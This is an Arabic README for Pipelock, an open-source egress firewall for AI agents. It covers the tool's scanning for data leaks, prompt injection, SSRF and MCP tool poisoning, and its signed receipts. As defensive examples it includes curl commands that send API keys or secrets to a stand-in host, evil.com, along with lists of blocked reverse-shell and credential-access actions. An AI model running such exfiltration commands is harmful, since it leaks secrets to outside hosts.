
pipelock v3.3.0
جدار ناري مفتوح المصدر لوكلاء الذكاء الاصطناعي يقوم بفحص حركة مرور HTTP وMCP وA2A وWebSocket بحثًا عن تسريب البيانات وSSRF وحقن الأوامر، ويصدر إيصالات إجراءات موقعة قابلة للتحقق لأغراض التدقيق.
Pipelock
جدار حماية وكيل ذكاء اصطناعي مفتوح المصدر لـ التحكم القابل للتحقق في الإرسال الصادر.
يقع Pipelock بين وكلاء الذكاء الاصطناعي والشبكة. يقوم بفحص حركة المرور المتوسطة عبر HTTP وWebSocket وMCP وA2A، بالإضافة إلى محتويات نفق CONNECT عند تمكين اعتراض TLS، بحثًا عن تسرب الأسرار وحقن الأوامر وهجمات SSRF وتسميم الأدوات وسلاسل استدعاء الأدوات الخطرة. يتم فحص اتصالات CONNECT العادية بدون اعتراض على مستوى اسم المضيف وعنوان URL.
يصدر Pipelock إيصالات إجراءات موقعة من الوسيط حول قرارات حدود المحتوى، بحيث يمكن للمراجع التحقق مما قرره Pipelock خارج وقت تشغيل الوكيل. مجموعة الاختبارات العامة agent-egress-bench تمارس عمليات الكشف. اعرف المزيد: جدار حماية ذكاء اصطناعي مفتوح المصدر.
يعمل مع: Claude Code · OpenAI Codex · Cline · OpenCode · Zed · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph
المشكلة · تحقق · بداية سريعة · عمليًا · ما يكتشفه · الميزات · الهندسة المعمارية · الوثائق · ساحة التجربة · المدونة · اسأل Dosu
جربه في متصفحك على ساحة التجربة المباشرة. إذا استحق Pipelock ذلك، قم بنجمة للمستودع ليجده الآخرون.
المشكلة
وكيل الذكاء الاصطناعي الخاص بك لديه $PROVIDER_API_KEY في بيئته، بالإضافة إلى وصول للشل. طلب واحد يمكنه تسريبها:```bash
curl "https://evil.com/steal?key=$PROVIDER_API_KEY" # game over, unless pipelock is watching
كل إجراء آلي يتخذه وكيلك يجب أن يعبر الحدود بين أسرارك والإنترنت المفتوح. يصبح Pipelock تلك الحدود عندما يتم توجيه الوكيل عبر بروكسي، غلاف MCP، صندوق الرمل، نموذج العزل المضيف، أو طوبولوجيا نشر الكتلة. يقوم بمسح حركة المرور الصادرة والواردة الوسيطة، ويحجب أو يبلغ عن الهجمات بناءً على الوضع، ويسجل دليلاً موقعًا على القرار.
---
## تحقق بنفسك
معظم أدوات أمان الوكيل تطلب منك الثقة في لوحة التحكم الخاصة بها. بينما يمنحك Pipelock إيصالًا موقعًا ويتيح لك التحقق منه بنفسك، دون اتصال بالإنترنت، باستخدام مفتاح تملكه. لا حاجة لحساب ولا خادم.
العرض التوضيحي المدمج يشعل سيناريوهات هجوم حقيقية، ويحجبها، ويكتب إيصالات موقعة بالإضافة إلى المفتاح العام على القرص بدون أي إعدادات أو شبكة:```bash
pipelock demo --receipts-dir ./out # runs attack scenarios, writes 7 signed receipts + signer.pub
pipelock verify-receipt "$(ls ./out/*.json | head -1)" --key ./out/signer.pub # check a signature yourself (each receipt is <action-id>.json)
تقوم بطاقة الأداء بتقييم كل ادعاء على حدة وتوضح ما لا تثبته: ما إذا كان أي شيء قد حدث خارج الحدود التي يتوسط فيها Pipelock. أسفلها، يسرد الجدول الزمني للإيصالات القرارات المقدمة المُسجلة مع أحكامها وروابط التجزئة. الإيصال الذي يكون صادقًا بشأن حدوده الخاصة يتفوق على علامة اختيار خضراء تخفيها.
عارض الأدلة مجاني ولا يحتاج إلى ترخيص:```bash pipelock evidence serve --receipt-dir ./out # read-only HTML report for one recorded session pipelock evidence view --receipt-dir ./out # static offline report, no server
ملاحظتان حول الصدق، مذكورتان مقدمًا. يقوم العرض التوضيحي بالتوقيع بمفتاح مؤقت يطبعه للتشغيل، مما يثبت أن الإيصالات متسقة ذاتيًا بدلاً من أن تكون مرتبطة بهوية مسماة. إن البيئة التجريبية العامة لـ Pipelock هي مسار منفصل يتحقق مقابل مفتاح تنشره Pipelock. والمشغل الذي يدير Pipelock يمتلك مفتاح التوقيع، لذا فإن الإيصال يثبت ما قرره الحدود وأن حامل المفتاح وقع عليه، وليس أن المشغل صادق. يسجل `pipelock anchor receipts` نقاط تفتيش سلسلة الإيصالات في خلفية محلية أو سجل شفافية Rekor للتدقيق لاحقًا، ولا يزال التحقق المستقل عن المشغل مقابل هذا المرساة قيد الإثبات من البداية إلى النهاية.
الحجة الكاملة لسبب تفوق الإثبات على الوعود موجودة في [العرض التوضيحي بدلاً من التصديق](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/security/demonstration-over-attestation.md).
---
## بدء سريع```bash
# Install from source (Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest
# Set up local agent integrations and generate a config
pipelock init
# Test the scanner
pipelock check --url "https://evil.com/?k=AKIAIOSFODNN7EXAMPLE" # blocked: AWS Access ID
pipelock check --url "https://docs.python.org/3/" # allowed
طرق التثبيت الأخرى
```bash # Download a binary # See https://github.com/luckyPipewrench/pipelock/releasesDocker
docker pull ghcr.io/luckypipewrench/pipelock:latest
Homebrew on macOS
brew install luckyPipewrench/tap/pipelock
</details>
<details>
<summary>تحقق من سلامة الإصدار</summary>```bash
gh attestation verify pipelock_3.2.0_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:v3.2.0 --owner luckyPipewrench
تنشر سير عمل الإصدار أدلة مصدر SLSA، وقوائم مكونات CycloneDX، ومجاميع الاختبار، وصور الحاويات الموقعة. تُنتج إصدارات المصدر باستخدام go install ثنائي خاص بالمجتمع فقط؛ بينما تتضمن قطع الإصدارات المبنية مسبقًا كودًا من المستوى المدفوع ينشط باستخدام مفتاح ترخيص صالح.
شاهدها في العمل
لوحة تحكم المشغل للمحترفين/المؤسسات (pipelock dashboard serve) هي وحدة تحكم للقراءة فقط فوق الأدلة الموقعة. تدعم المصادقة عبر الرمز (token)، أو OIDC، أو mTLS؛ وصلاحيات RBAC المحددة؛ وعروض البيانات الوصفية المعدلة؛ ورفع مستوى العرض الخام؛ وسجلات دورة حياة الإعفاء؛ والنسخ الاحتياطي والاستعادة؛ وشهادات التغطية؛ وعروض الأسطول. وهي موجودة في إصدارات المؤسسات وقطع الإصدارات مع ميزة الترخيص المطلوبة.
عارض الأدلة لجلسة واحدة المجاني الموضح أعلاه منفصل. لا يحتاج إلى ترخيص ولا يحتوي على تعداد عبر الوكلاء.
معرض لوحة التحكم
التقارير والمراقبة المجانية
ينشئ pipelock report --input events.jsonl تقارير بتنسيق HTML أو JSON أو حزمة موقعة مع تصنيف المخاطر، وخط زمني، وفئات الأحداث، وملحق أدلة. مسار Prometheus وGrafana المجاني يراقب مثيل Pipelock واحدًا وهو متميز عن مستوى التحكم في أسطول Enterprise Conductor.
ما يكتشفه
مقاسًا بمعيار عام وقابل للتكرار
agent-egress-bench يجري مجموعة من هجمات تسريب الوكيل وحقن الأوامر ضد Pipelock، أو ضد أي أداة أخرى. الأرقام تأتي من تشغيل يمكن لأي شخص تكراره، وليس ادعاء.
يعمل Pipelock بثلاثة أوضاع:
| الوضع | الأمان | تصفح الويب | حالة الاستخدام |
|---|---|---|---|
| صارم | قائمة السماح فقط | لا شيء | الصناعات المنظمة، عالية الأمان |
| متوازن | يمنع الساذج + يكتشف المتطور | عبر fetch أو وكيل أمامي | معظم المطورين (افتراضي) |
| تدقيق | تسجيل فقط | غير مقيد | التقييم قبل التنفيذ |
بالنسبة للوكلاء الذين يشغلون نماذج غير مرشحة أو معدومة، يضيف الإعداد المسبق hostile-model طبقات دفاعية على الوضع الصارم: عتبات إنتروبيا عدوانية، حظر شامل لأدوات الشبكة، ربط الجلسة، كشف التسريب عبر الطلبات، ومفتاح قتل مكون مسبقًا. يوصي pipelock audit بهذا الإعداد المسبق عندما يكتشف سلاسل أدوات معروفة لإزالة الحواجز عبر إشارات الاعتماديات.
| ناقل الهجوم | صارم | متوازن | تدقيق |
|---|---|---|---|
curl evil.com -d $SECRET | ممنوع | ممنوع | مسجل |
| سر في معاملات URL الاستعلامية | ممنوع | مكتشف بواسطة DLP | مسجل |
| سر مشفر بـ Base64 في URL | ممنوع | مكتشف بواسطة الإنتروبيا وDLP المفكوك | مسجل |
| نفق DNS | ممنوع | مكتشف بواسطة إنتروبيا النطاق الفرعي | مسجل |
| تسريب مجزأ | ممنوع | مكتشف بواسطة فحوصات المعدل والميزانية والتجزئة | مسجل |
| كتلة مشفرة بمفتاح عام في URL | ممنوع | مسجل عندما تشير إليه الإنتروبيا | مسجل |
تقييم صادق: الوضع الصارم يمنع HTTP الصادر الذي يمر عبر Pipelock باستثناء نطاقات API المسموح بها، لذلك لا توجد قناة تسريب عبر الوكيل نفسه. الوضع المتوازن يرفع المستوى من "أمر curl واحد" إلى "هجوم مخطط مسبقًا معقد". وضع التدقيق يمنحك رؤية ليس لديك اليوم. مع تمكين الصندوق الرملي (
pipelock sandbox) أو فرض طوبولوجيا احتواء المضيف/المجموعة، يضيف Pipelock حدًا لنظام التشغيل أو النشر فوق فحص المحتوى. لا يزال الإرسال المباشر يحتاج إلى منع بواسطة هذا الحد للأدوات غير المتعاونة التي تتجاهل إعدادات الوكيل.
مقارنة
| Pipelock | الماسحات (agent-scan) | الصناديق الرملية (srt) | وكلاء النواة (agentsh) | |
|---|---|---|---|---|
| منع تسريب الأسرار | صارم يمنع؛ متوازن يكتشف | جزئي (وضع الوكيل) | جزئي (على مستوى النطاق) | نعم |
| DLP + تحليل الإنتروبيا | نعم | لا | لا | جزئي |
| كشف حقن الأوامر | نعم | نعم | لا | لا |
| فحص MCP (ثنائي الاتجاه + تسميم الأداة) | نعم | نعم | لا | لا |
| وكيل WebSocket (فحص الإطارات) | نعم | لا | لا | لا |
| نقل HTTP لـ MCP (HTTP قابل للتدفق) | نعم | لا | لا | لا |
| مفتاح قتل طارئ (6 مصادر) | نعم | لا | لا | لا |
| كشف سلسلة استدعاء الأداة | نعم | لا | لا | لا |
| صندوق رملي للعملية (بدون Docker) | نعم | لا | لا (npm) | نعم (على مستوى النواة) |
| ثنائي واحد، بدون تبعيات | نعم | لا (Python) | لا (npm) | لا (نواة) |
مصفوفة المرجع: docs/comparison.md
مركز المقارنة الأساسي: مقارنة أمان وقت تشغيل الذكاء الاصطناعي
تغطية OWASP Agentic Top 10
| التهديد | التغطية |
|---|---|
| اختطاف هدف الوكيل ASI01 | قوية: MCP ثنائي الاتجاه + فحص الاستجابة |
| إساءة استخدام الأداة ASI02 | جزئية: الوكيل كأداة مضبوطة، فحص MCP |
| إساءة استخدام الهوية والامتيازات ASI03 | قوية: فصل القدرات + حماية SSRF |
| ثغرات سلسلة التوريد ASI04 | جزئية: مراقبة السلامة + فحص MCP |
| تنفيذ كود غير متوقع ASI05 | معتدلة: موافقة HITL، إفتراضيات الإغلاق عند الفشل |
| تسميم الذاكرة والسياق ASI06 | معتدلة: كشف الحقن + نشر تلوث الجلسة |
| اتصال غير آمن بين الوكلاء ASI07 | جزئية: فحص MCP/A2A، هوية الوكيل، السلامة، التوقيع |
| فشل متتالي ASI08 | معتدلة: بنية الإغلاق عند الفشل، تحديد المعدل |
| استغلال الثقة بين الإنسان والوكيل ASI09 | جزئية: أوضاع HITL، تسجيل التدقيق |
| وكلاء مارقون ASI10 | قوية: قائمة السماح للنطاقات + تحديد المعدل + فصل القدرات |
التفاصيل وأمثلة التكوين وتحليل الفجوات: docs/owasp-mapping.md
ما يفعله
Pipelock هو وكيل إرسال للذكاء الاصطناعي وتحكم أمان MCP. يجلس في خط مستقيم بين وكيل الذكاء الاصطناعي والشبكة، يفحص حركة المرور الصادرة والواردة، ويصدر إيصالات موقعة بالإضافة إلى بيانات وساطة للإثبات خارج وقت تشغيل الوكيل. تقييم هوية عبء العمل AARP/SVID هو من جانب المدقق اليوم: لا تستهلك بيئات تشغيل الوكيل وMCP أدلة SVID في قرارات السماح/المنع المباشرة أو ربط هوية مستلم الإيصال من X.509-SVID.
الكشف والفحص
- خط أنابيب ماسح URL مرتب: فحوصات طول URL وتحليله، والتحقق من المخطط، وكشف CRLF وتجاوز المسار، وسياسة القائمة المسموح بها والمحظورة، وSSRF الحرفي للـIP الثابت وطوابق DLP الأساسية، وDLP المكون، وتحليل إنتروبيا المسار والنطاق الفرعي، وحماية SSRF للـDNS وإعادة الربط، وحدود المعدل لكل نطاق، وميزانيات البيانات، وفحوصات السياق النهائية. يعمل DLP قبل تحليل DNS، لذلك يتم اكتشاف الأسرار قبل مغادرة استعلام DNS للوكيل. انظر docs/bypass-resistance.md.
- DLP: 65 نمطًا مدمجًا لمفاتيح API، والرموز، وبيانات الاعتماد، ومفاتيح العملات الرقمية، وأسرار البيئة، والمعرفات المالية مع التحقق من المجموع الاختباري. يستخدم كشف عبارة بذرة BIP-39 بحثًا في القاموس، ونوافذ منزلقة، والتحقق من المجموع الاختباري SHA-256.
- فحص الاستجابة: 32 نمطًا مدمجًا لحقن الأوامر وتسميم الحالة/التحكم، بالإضافة إلى تطبيع من 6 تمريرات للأحرف ذات العرض الصفري، والهوموغليف، والليتسبيك، والمسافات الاختيارية، وطي حروف العلة، وbase64، والست عشري. الإجراءات هي
block،strip،warn، أوask. - SSE المتدفق: استجابات
text/event-streamمن بوابات LLM وMCP HTTP/SSE تتدفق رمزًا برمز مع فحص DLP وحقن لكل حدث ومتداول عبر الأحداث. يؤدي الكشف إلى إنهاء التدفق مع الإغلاق عند الفشل. انظر دليل تدفق SSE. - فحص جسم الطلب: يتم فحص الرؤوس والأجسام قبل مغادرتها المسار المحمي عبر JSON، وبيانات النموذج، والنص الخام، وطلبات الوكيل العكسي، وحركة مرور CONNECT المعترضة TLS، وإطارات عميل WebSocket الصادرة.
- تنقيح الطلب: إعادة كتابة JSON اختيارية تستبدل قيم الأسرار المطابقة بنائبات منمطة مثل
<pl:aws-access-key:1>عبر HTTP، WebSocket، ووسائطtools/callفي MCP. تسجل الإيصالات الملف الشخصي النشط والأعداد حسب الفئة بدلاً من الأسرار النصية. - حماية العنوان: التحقق من صحة عناوين ETH وBTC وSOL وBNB يكتشف عمليات تبديل الوجهة المتشابهة باستخدام بصمة البادئة/اللاحقة وقائمة سماح المشغل.
- نتائج قابلة للتفسير: يطبع
pipelock explain <url>(أيضًاexplain event <id>وexplain mcp) الماسح، والطبقة، وقاعدة المطابقة، والسطح المفحوص، وأضيق مقبض تكوين متاح للإيجابية الخاطئة. انظرdocs/cli/explain.md. - رموز الكناري: ينشئ
pipelock canaryتكوين رمز العسل. ظهور سر اصطناعي في حركة المرور الصادرة يثبت أن وكيلًا أو شيئًا في سلسلته يقوم بتسريب متغيرات البيئة. انظر رموز الكناري. - فحص ملفات المهارات: يقوم
pipelock skill-scanبجرد ملفات مهارات الوكيل، ومقارنتها بملف قفل مملوك للمشغل، ووضع علامات على مجموعات المصدر إلى المصب مثل بيانات الاعتماد إلى المصب الشبكي أو الصدفة إلى الكتابة مع دليل على السطر قبل تشغيل أي شيء. انظرdocs/cli/skill-scan.md.
أمان MCP
يغلف Pipelock خوادم MCP بفحص ثنائي الاتجاه:```bash
Wrap a local MCP server over stdio
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp
Bridge a stdio client to a remote Streamable HTTP server
pipelock mcp proxy --upstream http://localhost:8080/mcp
Run the HTTP proxy and an MCP HTTP listener together
pipelock run --config pipelock.yaml --mcp-listen 127.0.0.1:8889 --mcp-upstream http://localhost:3000/mcp
- **مسح الإدخال:** يتم فحص طلبات عميل MCP بحثًا عن تسريبات DLP وحقن في وسيطات الأداة.
- **مسح الاستجابة:** يتم فحص استجابات الخادم قبل أن يراها الوكيل.
- **تسميم الأداة:** يتم فحص أوصاف `tools/list` بحثًا عن تعليمات مخفية وتغييرات مفاجئة أثناء الجلسة.
- **سياسة الأداة:** 17 قاعدة مدمجة تمنع حذف الملفات المدمر، الوصول إلى بيانات الاعتماد، الصدف العكسية، آليات الثبات، تنفيذ الأوامر المشفرة، واستدعاءات الأدوات عالية المخاطر ذات الصلة قبل التنفيذ.
- **سلاسل استدعاءات الأدوات:** 10 أنماط محور الفئة المدمجة تكتشف سلاسل الاستطلاع، سرقة بيانات الاعتماد، تجميع البيانات، الثبات، التصدير، وسلاسل رد الاتصال مع تسامح فجوة قابل للتكوين.
- **فحص A2A:** يتم فحص حركة بروتوكول الوكيل إلى الوكيل من Google على المسارات الأمامية و MCP؛ Pipelock ليس وكيلًا مستقلاً لـ A2A.
- **مستمعو MCP HTTP الموثقون (v3.2.0):** يفشل مستمعو MCP غير المحليين (غير loopback) بشكل مغلق افتراضيًا ويتطلبون `--mcp-auth-token-file`، أو `--mcp-allow-unauthenticated` صريح للنشر المعزول بسياسة الشبكة. يرفض مستمعو loopback بدون رمز مميز سلطات المضيف ذات الارتداد DNS ومنفذ خاطئ وينظفون بيانات اعتماد المستمع من الرؤوس.
### الاحتواء
يستخدم احتواء العمليات غير المميزة أساسيات نظام التشغيل الأصلية. يستخدم Linux Landlock و seccomp ومساحات أسماء الشبكة. يستخدم macOS ملفات تعريف `sandbox-exec`. في الحاويات، يحافظ `--best-effort` على Landlock و seccomp عندما يكون إنشاء مساحة الاسم مقيدًا، بينما يستخدم فحص الشبكة التوجيه القائم على الوكيل.```bash
pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server
احتواء المضيف يتقدم أكثر على لينكس:```bash pipelock contain install pipelock contain verify pipelock contain run -- claude-code
`pipelock contain install / run / verify / rollback / add-tool / grant-workspace / revoke-workspace / ca-refresh` يدير نموذج مشغل/بروكسي/وكيل بثلاثة معرفات فريدة (UID) مع توجيه مطابقة المالك في nftables، وإعداد خدمة systemd، وأوامر التغليف، وقوائم التحكم في الوصول إلى مساحة العمل (ACLs)، وتحديث الشهادة المرجعية (CA)، وأدلة الوضعية. انظر [`docs/contain-cli.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/contain-cli.md).
### الأدلة والإيصالات
- **مسجل الرحلة:** سجل أدلة JSONL متسلسل بالتجزئة مع نقاط تفتيش موقعة بـ Ed25519 وتنقيح DLP. يأمر `pipelock init` بتوفير دليل مسجل ومفتاح توقيع للتركيبات الأساسية، بينما يظل المسجل خاملاً حتى وجود دليل ومفتاح. انظر [Flight Recorder](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/flight-recorder.md).
- **إيصالات الإجراءات:** سجلات موقعة تُصدر للإجراءات الوسيطة، تحمل الحكم، وتجزئة السياسة، والنقل، وطبقة الماسح. تنتج الكتل إيصالات؛ يتطلب تطبيق إيصالات المسار المسموح به `flight_recorder.require_receipts`. تحقق باستخدام `pipelock verify-receipt --key <signer.pub>`. عمليات التشغيل غير المثبتة (unpinned) هي بنيوية فقط وتخرج برمز غير صفري ما لم يتم تمرير `--allow-unpinned`.
- **غلاف الوساطة:** بيانات وصفية جانبية RFC 8941 على طلبات HTTP المُعاد توجيهها و `_meta` MCP، مع نوع الإجراء، الحكم، هوية الفاعل، تجزئة السياسة، سياق التلوث، ومعرف ارتباط الإيصال. انظر [دليل الاتحاد](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/federation.md).
- **مطابقة الإيصال:** أربعة تطبيقات مستقلة للتحقق عبر اللغات (Go، TypeScript، Rust، وPython) تعمل مقابل مجموعة مطابقة مشتركة [conformance corpus](https://github.com/luckypipewrench/pipelock/blob/HEAD/sdk/conformance/)، بما في ذلك مدخلات مشوهة وقابلة للتزوير مثل المفاتيح المكررة، تجاوز الأعداد الصحيحة، والبدائل غير المزدوجة. يستخدم سطح wasm للمتصفح تطبيق التحقق بلغة Go. يبقى تقييم AARP/SVID ملف تعريف تحقق غير متصل، وليس تطبيق هوية وقت التشغيل.
- **المراسي:** يسجل `pipelock anchor receipts` نقاط تفتيش سلسلة الإيصالات في خلفية محلية أو Rekor. يعتبر تثبيت Rekor مادة إثبات للتدقيق لاحقًا؛ يتطلب التحقق من Rekor مفاتيح سجل مثبتة (pinned) ولا يزال مسار الاستقلالية التام للمشغل قيد الإثبات.
- **كبسولة الوضعية:** ينتج `pipelock posture emit` و `pipelock posture verify` لقطة موقعة لوضعية تنفيذ النشر، مع بوابة CI ونموذج تسجيل، حتى يتمكن المراجع من تأكيد أن الحدود تم تكوينها كما تدعي.
### الأسطول والمؤسسات
- **لوحة تحكم المشغل:** `pipelock dashboard serve` هي وحدة تحكم للقراءة فقط على الأدلة الموقعة. تفتح Pro عروض النظرة العامة، الأدلة، الإعفاءات، الوكلاء، الميزانيات، والثقة والمفاتيح؛ تضيف Enterprise عروض الأسطول، منصة العمل، والحوادث. انظر [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md).
- **عارض الأدلة المجاني:** يعرض `pipelock evidence serve` و `pipelock evidence view` جلسة مسجل محددة بدون ترخيص أو تعداد عبر الوكلاء. يتحقق `pipelock evidence verify-cert` من شهادات التغطية الصادرة عن Pro دون اتصال.
- **الموصل (Conductor):** مستوى تحكم أسطول Enterprise لتوزيع حزم السياسات الموقعة، ومغسلة الأدلة الموقعة (`pipelock fleet-sink`)، والتسجيل، والقتل عن بعد، والاسترجاع، والتشغيل التجريبي، وإعادة تشغيل القرار، والفحص المسبق لانجراف حالة التشغيل/التطبيق عبر mTLS/SPIFFE. يطبق الأتباع محليًا؛ الوضع الافتراضي للسياسة القديمة يشغل مصدر رفض مستقل بعد نافذة السماح، بينما التجاوز الموثق `continue_last_known_good` يضعف هذه الوضعية. لا يحتفظ Conductor بأسرار الوكيل. انظر [دليل Conductor](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md).
- **الحجز القانوني:** يدير `pipelock dashboard legal-hold add/list/release` حجوزات الحفظ كبيانات وصفية للامتثال محفوظة خارج سلطة HTTP الخاصة بلوحة التحكم، بحيث يمكن للوحة تحكم مخترقة قراءة الحجوزات ولكن لا يمكنها تزويرها أو حذفها أبدًا.
- **خط الأساس السلوكي:** تحديد السلوك ثم قفله لسلوك أداة MCP باستخدام `pipelock baseline list/show/ratify/forget` لموافقة المشغل وإعادة التعلم. انظر [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md).
### قابلية التشغيل
- **مفتاح الإيقاف:** ستة مصادر تنشيط مستقلة: ملف التكوين، API عن بعد، SIGUSR1، ملف الحارس، القتل عن بعد بواسطة Conductor، واكتشاف الحزمة القديمة. أي مصدر نشط واحد يمنع حركة المرور، مع استثناءات نقطة النهاية وعنوان IP في المتحكم.
- **API المسح:** مسح برمجي لنتائج `url` و `dlp` و `prompt_injection` و `tool_call` مع مصادقة رمز الحامل (bearer token)، تحديد معدل لكل رمز، نتائج منظمة، ومقاييس Prometheus. انظر [docs/scan-api.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/scan-api.md).
- **حارس نظام الملفات:** يراقب أدلة عمل الوكيل بحثًا عن أسرار مكتوبة على القرص ويُسند عمليات الكتابة إلى سلسلة العمليات الفرعية MCP على Linux. انظر [docs/guides/filesystem-sentinel.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/filesystem-sentinel.md).
- **إصدار الأحداث:** يُعيد توجيه أحداث التدقيق إلى أنظمة SIEM، ومستقبلات webhook، وsyslog، وCEF، وOTLP، ومخرجات المقاييس دون حظر المسار السريع للبروكسي. انظر [docs/guides/siem-integration.md](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/siem-integration.md).
- **التقييم الأمني:** يقوم `pipelock assess init` و `pipelock assess run` و `pipelock assess finalize` بتنظيم محاكاة الهجوم، وتسجيل التكوين، والتحقق من التثبيت، واكتشاف MCP في حزمة أدلة قابلة للتكرار. التعرضات الحرجة مثل خوادم MCP غير المحمية تحد من الدرجة بغض النظر عن النتيجة العددية. يُظهر الملخص المجاني درجتك ودرجات الأقسام والنتائج العليا؛ يفتح الترخيص التقرير الكامل مع نتائج خاصة بالخادم وأوامر الإصلاح وأدلة موقعة بـ Ed25519.
<details>
<summary>المزيد من الميزات</summary>
| الميزة | ما تفعله |
|---------|-------------|
| **تقارير التدقيق** | يقوم `pipelock report --input events.jsonl` بإنشاء تقارير HTML/JSON/حزمة مع تصنيف المخاطر والجدول الزمني وملحق الأدلة. توقيع Ed25519 باستخدام `--sign`. ([نموذج تقرير](https://github.com/luckypipewrench/pipelock/blob/HEAD/examples/sample-report.html)) |
| **التشخيص** | يقوم `pipelock diagnose` بتشغيل 7 فحوصات محلية للتحقق من تكوينك من البداية إلى النهاية بدون شبكة. |
| **طبيب التنفيذ** (v2.5) | يبلغ `pipelock doctor` عن الحالة المُهيأة مقابل القابلة للتنفيذ للوكيل الوسيط (proxying)، اعتراض TLS، فحص جسم الطلب، درع المتصفح، تغليف MCP، سلامة ثنائيات MCP، منشأ الأداة، حارس الملفات، Sentry، وإشارات حدود النشر. |
| **حظر حقن جسم الطلب** (v2.5) | نتائج حقن التعليمات (prompt-injection) في جسم الطلب ونتائج DLP الحرجة تحظر بشكل صارم الوجهات غير المزودة في وضع التنفيذ عبر النقل الأمامي، العكسي، اعتراض TLS، وWebSocket، مع رؤوس سبب الحظر لتشخيص مرئي للمشغل. |
| **سياسة الطلب** (v2.6) | مسارات السماح الافتراضي/الرفض/التحذير على عمليات API الصادرة: تطابق المسار بالإضافة إلى مسندات عملية GraphQL، التكرار داخل مغلفات JSON `$batch`، الفشل المغلق على الأجسام غير القابلة للتحليل أو المعتمة، والتشغيل قبل بوابة العقد. انظر [دليل سياسة الطلب](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/request-policy.md). |
| **اعتراض TLS** | اختياري CONNECT tunnel MITM: فك التشفير، فحص الأجسام/الرؤوس/الردود، إعادة التشفير. يقوم `pipelock tls init` بإنشاء CA، ثم يطبع `pipelock tls install-ca` خطوات تثبيت مخزن الثقة للنظام. |
| **تلميحات الحظر** | `explain_blocks: true` الاختياري يضيف اقتراحات إصلاح للردود المحظورة. |
| **تدقيق المشروع** | يقوم `pipelock audit ./project` بفحص المخاطر الأمنية وإنشاء تكوين مخصص. |
| **تسجيل التكوين** (v2.6) | يقوم `pipelock audit score --config pipelock.yaml` بتقييم الوضع الأمني عبر 23 فئة بميزانية 170 نقطة ودرجة حرفية. |
| **سلامة الملفات** | تكشف قوائم SHA256 عن الملفات المعدلة أو المضافة أو المحذوفة في مساحة العمل. |
| **حماية Git** | يلتقط `git diff \| pipelock git scan-diff` الأسرار قبل الالتزام (commit). |
| **التوقيع بـ Ed25519** | إدارة المفاتيح، توقيع الملفات، والتحقق من التوقيع للثقة متعددة الوكلاء. |
| **تحديد سلوك الجلسة** | تحليل سلوكي لكل جلسة للاندفاعات النطاقية والارتفاعات الحجمية. |
| **التنفيذ التكيفي** | درجة تهديد لكل جلسة مع تصعيد من تحذير إلى حظر، مؤقتات خفض التصعيد، واكتشاف الاندفاعات النطاقية. |
| **CLI المشغل التكيفي** (v2.5) | يكشف `pipelock adaptive status / flush / whoami` الحالة التكيفية لوقت التشغيل من خلال API الإدارة الموثقة. انظر [`docs/cli/adaptive.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/adaptive.md). |
| **كبت النتائج** | إسكات الإيجابيات الكاذبة المعروفة من خلال قواعد التكوين أو تعليقات `pipelock:ignore` المضمنة. |
| **دعم متعدد الوكلاء** | تعريف الوكيل من خلال رأس `X-Pipelock-Agent` للتصفية لكل وكيل. |
| **مراقبة الأسطول** | مقاييس Prometheus لكل مثيل بالإضافة إلى [لوحة Grafana](https://github.com/luckypipewrench/pipelock/blob/HEAD/configs/grafana-dashboard.json) الجاهزة للاستيراد. مراقبة مجانية لمثيل واحد، متميزة عن Conductor. |
| **لوحة تحكم المشغل** (v3.1، Pro/Enterprise) | يوفر `pipelock dashboard serve` عروض النظرة العامة، الأدلة، الإعفاءات، الوكلاء، الميزانيات، الثقة والمفاتيح، الأسطول، منصة العمل، والحوادث للقراءة فقط مع مصادقة رمز أو OIDC أو mTLS، RBAC محدود، رفع عرض خام، نسخ احتياطي/استعادة، سجلات دورة حياة الإعفاء، وشهادات التغطية. انظر [`docs/cli/dashboard.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/dashboard.md). |
| **عارض الأدلة المجاني** (v3.1) | يخدم `pipelock evidence serve` جلسة مسجل محددة كتقرير HTML للقراءة فقط بدون ترخيص وبدون تعداد عبر الوكلاء. يتحقق `pipelock evidence verify-cert` من شهادات التغطية الصادرة عن Pro دون اتصال. |
| **Conductor: مستوى تحكم الأسطول** (v2.7، Enterprise) | توزيع حزمة سياسة موقعة، مغسلة تدقيق الأدلة الموقعة (`pipelock fleet-sink`)، التسجيل، القتل عن بعد، استرجاع السياسة، التشغيل التجريبي، إعادة تشغيل القرار، والفحص المسبق لانجراف حالة التشغيل/التطبيق عبر mTLS/SPIFFE. مقيد بميزة ترخيص `fleet`؛ سلوك السياسة القديمة صريح ويتم تعيينه افتراضيًا على الرفض الصارم. انظر [دليل Conductor](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/guides/conductor.md). |
| **مسح A2A** | اكتشاف تسميم بطاقة الوكيل (Agent Card)، مراقبة انجراف البطاقة، ومنع تهريب الجلسة لبروتوكول وكيل إلى وكيل (Agent-to-Agent) من Google على مسارات التوجيه (forward)/MCP. |
| **خط الأساس السلوكي** | تحديد السلوك ثم قفله لسلوك أداة MCP باستخدام `pipelock baseline list/show/ratify/forget` لموافقة المشغل وإعادة التعلم. انظر [`docs/cli/baseline.md`](https://github.com/luckypipewrench/pipelock/blob/HEAD/docs/cli/baseline.md). |
